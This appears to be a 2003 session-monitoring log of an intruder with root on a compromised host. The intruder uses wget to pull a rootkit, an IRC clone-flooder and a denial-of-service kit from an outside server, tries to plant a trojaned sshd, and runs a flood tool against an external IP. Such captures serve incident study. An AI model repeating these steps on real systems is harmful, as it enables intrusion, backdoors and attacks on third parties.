Thu Jun 12 14:50:11 HKT 2003
================================
Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
ls -la /snin/kfl�
ls: /snin/kfl: No such file or directory
�]0;operator@pc11: /root�[root@pc11 /root]# cd /usr/lib/.tux
bash: cd: /usr/lib/.tux: No such file or directory
�]0;operator@pc11: /root�[root@pc11 /root]#
�]0;operator@pc11: /root�[root@pc11 /root]# cd /usr/bin/.tuyx� �� �x
�]0;operator@pc11: /usr/bin/.tux�[root@pc11 .tux]# ls
�[01;34mbackup�[00m �[01;32msuidsh�[00m �[01;34mtools�[00m
�]0;operator@pc11: /usr/bin/.tux�[root@pc11 .tux]# cd tools
�]0;operator@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ls
�[01;34mbitchx�[00m �[01;34mfirewall�[00m �[01;34msniffer�[00m �[01;34mssh�[00m
�[01;34mecmf�[00m �[01;31mfirewall.tgz�[00m �[01;32msocklist�[00m �[01;34msynscan�[00m
�[01;34mexploits�[00m �[01;31mpsymicutz.tgz�[00m �[01;31msocklist.tgz�[00m �[01;34mutils�[00m
�]0;operator@pc11: /usr/bin/.tux/tools�[root@pc11 tools]#
�]0;operator@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 555 124160 0 20926 21 sshd
tcp 6668 94672 0 7990 9 fam
tcp 111 194193 0 2992 15 portmap
tcp 143 1305 0 771 9 xinetd
tcp 2000 124163 0 20930 19 sshd
tcp 10003 94807 0 8028 13 smbd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 198513 0 4230 3 mysqld
tcp 23 198353 0 4142 2 in.telnetd
tcp 4223 186078 0 7990 16 fam
tcp 4108 96977 0 7990 15 fam
tcp 4101 94679 0 7990 14 fam
tcp 4237 198576 0 4258 5 number_cum
tcp 3306 198505 0 4230 4 mysqld
tcp 21 163664 0 28739 1 sh
tcp 21 186128 0 4061 1 write
udp 514 192743 0 2356 7 syslogd
udp 69 124237 0 20938 3 xinetd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
udp 111 194178 0 2992 14 portmap
�]0;operator@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet localhost 1� �555
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
SSH-1.5-1.2.32
Connection closed by foreign host.
�]0;operator@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# cd /
�]0;operator@pc11: /�[root@pc11 /]# wget www.fracktal.us/r.tgz
--13:48:00-- http://www.fracktal.us/r.tgz
=> `r.tgz'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 405,964 [application/x-compressed]
0K -> .......... .......... .......... .......... .......... [ 12%]
50K -> .......... .......... .......... .......... .......... [ 25%]
100K -> .......... .......... .......... .......... .......... [ 37%]
150K -> .......... .......... .......... .......... .......... [ 50%]
200K -> .......... .......... .......... .......... .......... [ 63%]
250K -> .......... .......... .......... .......... .......... [ 75%]
300K -> .......... .......... .......... .......... .......... [ 88%]
350K -> .......... .......... .......... .......... ...... [100%]
13:48:01 (1.41 MB/s) - `r.tgz' saved [405964/405964]
�]0;operator@pc11: /�[root@pc11 /]# tar -xzvf r.tgz
.rootkit/
.rootkit/startup.tgz
tar: .rootkit/startup.tgz: time stamp 2003-06-13 05:16:53 is 55728 s in the future
.rootkit/curatare.tgz
.rootkit/sshd.tgz
.rootkit/mail-info.tgz
.rootkit/sniffer.tgz
.rootkit/trojans.tgz
.rootkit/skrootkit.tgz
setup
tar: .rootkit/: time stamp 2003-06-13 05:17:00 is 55735 s in the future
tar: setup: time stamp 2003-06-13 05:15:50 is 55665 s in the future
�]0;operator@pc11: /�[root@pc11 /]# cd .rootkit
�]0;operator@pc11: /.rootkit�[root@pc11 /.rootkit]# ls
�[01;31mcuratare.tgz�[00m �[01;31mskrootkit.tgz�[00m �[01;31msshd.tgz�[00m �[01;31mtrojans.tgz�[00m
�[01;31mmail-info.tgz�[00m �[01;31msniffer.tgz�[00m �[01;31mstartup.tgz�[00m
�]0;operator@pc11: /.rootkit�[root@pc11 /.rootkit]# tar -xzvf sshd.tgz
sshd/
sshd/sshd
sshd/ssh_host_key
sshd/ssh_random_seed
sshd/sshd_config
�]0;operator@pc11: /.rootkit�[root@pc11 /.rootkit]# cd ssah
�]0;operator@pc11: /.rootkit�[root@pc11 /.rootkit]#
�]0;operator@pc11: /.rootkit�[root@pc11 /.rootkit]# cd sshd
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]# cp ssh /usr/bin/portmap
cp: cannot stat `ssh': No such file or directory
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]# cp ssh /usr/bin/portmap
[root@pc11 sshd]# cp ssh�[1@d
cp: cannot create regular file `/usr/bin/portmap': Permission denied
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]# \� �chatrr
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]#
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]# chattre
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]#
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]# chattr -saui /usr/bin/portmap
chattr: No such file or directory while trying to stat /usr/bin/portmap
�]0;operator@pc11: /.rootkit/sshd�[root@pc11 sshd]#
Back at local tty.
end at Thu Jun 12 14:52:24 HKT 2003
----------------------------------
Thu Jun 12 14:52:52 HKT 2003
================================
Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
cd
�]0;operator@pc11: /root�[root@pc11 /root]#
�]0;operator@pc11: /root�[root@pc11 /root]# cd /tmp
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# ls
�[00mcc9pDA9i.i�[00m �[00mccLh7jsI.o�[00m �[00mccb8uM2Q.i�[00m �[00mccnQ7rqC.i�[00m �[00mccybuMwr.i�[00m
�[00mccAEhmlQ.i�[00m �[00mccVLmQtG.o�[00m �[00mccdE6N7U.i�[00m �[00mccpOQBg6.i�[00m �[00mccynWYch.s�[00m
�[00mccBkFfKq.s�[00m �[00mccXKwigk.i�[00m �[00mcceVnUta.i�[00m �[00mccsX0FMZ.o�[00m �[01;34mssh-XXZuI9ez�[00m
�[00mccEUTFrK.s�[00m �[00mccXZ55bE.i�[00m �[00mccffIxoK.i�[00m �[00mccvIdHVh.o�[00m
�[00mccJnnLs6.o�[00m �[00mccZOX9Ie.i�[00m �[00mccmbVH0l.i�[00m �[00mccy31ixi.i�[00m
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# wget www.fracktal.us/mirkforce.tgz
--13:49:34-- http://www.fracktal.us/mirkforce.tgz
=> `mirkforce.tgz'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 55,334 [application/x-compressed]
0K -> .......... .......... .......... .......... .......... [ 92%]
50K -> .... [100%]
13:49:34 (4.80 MB/s) - `mirkforce.tgz' saved [55334/55334]
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# tar -xzvf mirkforce.tgz
./ecmf/
./ecmf/idents
./ecmf/id
./ecmf/nicks
./ecmf/nicks2
./ecmf/realnames
./ecmf/mirkforce
./ecmf/mfclean
./ecmf/mf
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# cd ecmf
�]0;operator@pc11: /tmp/ecmf�[root@pc11 ecmf]# ./mirkforce
rand0m seed from /dev/urandom: �[1;37m68988027�[0m
Found nickz file. index: 44
Found identz file. index: 31
Found realnamez file. index: 20
Your IPaddr: �[1;37m192.168.20.1�[0m (�[1;32meth0�[0m)
Checking �[1;37m192.168.20.*�[0m
[�[0;36m*�[0m]
�[0;36m*�[0m
...hErE c0m3z �[1;32mtHa lEEtfOrCe!�[0m (riding �[1;37m252�[0m IPz)
Cleaning up...
SIOCSIFADDR: File exists
�[1;37m*** err0r when cleaning up, msg programmer :>�[0m
�]0;operator@pc11: /tmp/ecmf�[root@pc11 ecmf]# ./mfclean
[eC] Starting mfclean...
[eC] Cleanup done...
�]0;operator@pc11: /tmp/ecmf�[root@pc11 ecmf]# cd ..
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# rm -rf mirck�� �� �kforce.tgz ecmf
�]0;operator@pc11: /tmp�[root@pc11 /tmp]#
Back at local tty.
end at Thu Jun 12 14:53:51 HKT 2003
----------------------------------
Thu Jun 12 16:21:47 HKT 2003
================================
Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
/tmp
�]0;operator@pc11: /root�[root@pc11 /root]# wg
�]0;operator@pc11: /root�[root@pc11 /root]# cd /tmp
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# wget www.fracktal.us/flood.tar.g
--15:18:29-- http://www.fracktal.us/flood.tar.g
=> `flood.tar.g'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 404 Not Found
15:18:30 ERROR 404: Not Found.
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# wget www.fracktal.us/flood.tar.gz
--15:18:32-- http://www.fracktal.us/flood.tar.gz
=> `flood.tar.gz'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 471,040 [application/x-gzip]
0K -> .......... .......... .......t... ....a...... ...r..... .. [ 10%]
50K -> ...-0....... ...x....... .......... .
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# �wget www.fracktal.us/flood.tar.gz
--15:18:37-- http://www.fracktal.us/flood.tar.gz
=> `flood.tar.gz.1'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 471,040 [application/x-gzip]
0K -> .......... .......... .......... .......... .......... [ 10%]
50K -> .......... .......... .......... .......... .......... [ 21%]
100K -> .......... .......... .......... .......... .......... [ 32%]
150K -> .......... .......... .......... .......... .......... [ 43%]
200K -> .......... .......... .......... .......... .......... [ 54%]
250K -> .......... .......... .......... .......... .......... [ 65%]
300K -> .......... .......... .......... .......... .......... [ 76%]
350K -> .......... .......... .......... .......... .......... [ 86%]
400K -> .......... .......... .......... .......... .......... [ 97%]
450K -> .......... [100%]
15:18:44 (63.34 KB/s) - `flood.tar.gz.1' saved [471040/471040]
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# ls
�[00mcc9pDA9i.i�[00m �[00mccLh7jsI.o�[00m �[00mccb8uM2Q.i�[00m �[00mccnQ7rqC.i�[00m �[00mccybuMwr.i�[00m
�[00mccAEhmlQ.i�[00m �[00mccVLmQtG.o�[00m �[00mccdE6N7U.i�[00m �[00mccpOQBg6.i�[00m �[00mccynWYch.s�[00m
�[00mccBkFfKq.s�[00m �[00mccXKwigk.i�[00m �[00mcceVnUta.i�[00m �[00mccsX0FMZ.o�[00m �[01;31mflood.tar.gz�[00m
�[00mccEUTFrK.s�[00m �[00mccXZ55bE.i�[00m �[00mccffIxoK.i�[00m �[00mccvIdHVh.o�[00m �[00mflood.tar.gz.1�[00m
�[00mccJnnLs6.o�[00m �[00mccZOX9Ie.i�[00m �[00mccmbVH0l.i�[00m �[00mccy31ixi.i�[00m �[01;34mssh-XX2U64k3�[00m
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# tar -xvf flood.tar.gz.1
flood/
flood/alpha
flood/bloop
flood/da.sh
flood/juno
flood/nestea
flood/overdrop
flood/rc8
flood/s
flood/sl
flood/sl2
flood/sl3
flood/smack
flood/smurf5
flood/stealth
flood/synk
flood/udp
flood/broadcast.txt
flood/slice3
flood/stream
flood/stream2
flood/synk7
flood/synsend
flood/synhose
flood/trash
flood/trash2
flood/xdestroy
flood/xshock
flood/slice2
flood/smurf6-linux+LPG.c
flood/vadimI
flood/vadimI.c
flood/smurf6
�]0;operator@pc11: /tmp�[root@pc11 /tmp]# cd flood
�]0;operator@pc11: /tmp/flood�[root@pc11 flood]# ls
�[01;32malpha�[00m �[01;32ms�[00m �[01;32msmurf6�[00m �[01;32msynsend�[00m
�[01;32mbloop�[00m �[01;32msl�[00m �[00msmurf6-linux+LPG.c�[00m �[01;32mtrash�[00m
�[00mbroadcast.txt�[00m �[01;32msl2�[00m �[01;32mstealth�[00m �[01;32mtrash2�[00m
�[01;32mda.sh�[00m �[01;32msl3�[00m �[01;32mstream�[00m �[01;32mudp�[00m
�[01;32mjuno�[00m �[01;32mslice2�[00m �[01;32mstream2�[00m �[01;32mvadimI�[00m
�[01;32mnestea�[00m �[01;32mslice3�[00m �[01;32msynhose�[00m �[01;32mvadimI.c�[00m
�[01;32moverdrop�[00m �[01;32msmack�[00m �[01;32msynk�[00m �[01;32mxdestroy�[00m
�[01;32mrc8�[00m �[01;32msmurf5�[00m �[01;32msynk7�[00m �[01;32mxshock�[00m
�]0;operator@pc11: /tmp/flood�[root@pc11 flood]# ./stealth
�[1;30mtw�[0mit�[1mch@St�[0meal�[1;30mth�[33m:�[0m
�[1;5;31mThis tool is extremely dangerous. Use at your own risk!�[0m
�[1;30mUsage:�[0m st�[1m-�[0mkill <�[1mhost�[0m> <�[1mport�[0m>
�]0;operator@pc11: /tmp/flood�[root@pc11 flood]# ./stealth 80.35.42.37 80&
[1] 5198
�]0;operator@pc11: /tmp/flood�[root@pc11 flood]#
�[1mStealth�[0m> 80.35.42.37 �[1;30m:�[0m port 80
�]0;operator@pc11: /tmp/flood�[root@pc11 flood]#
Back at local tty.
end at Thu Jun 12 16:32:49 HKT 2003
----------------------------------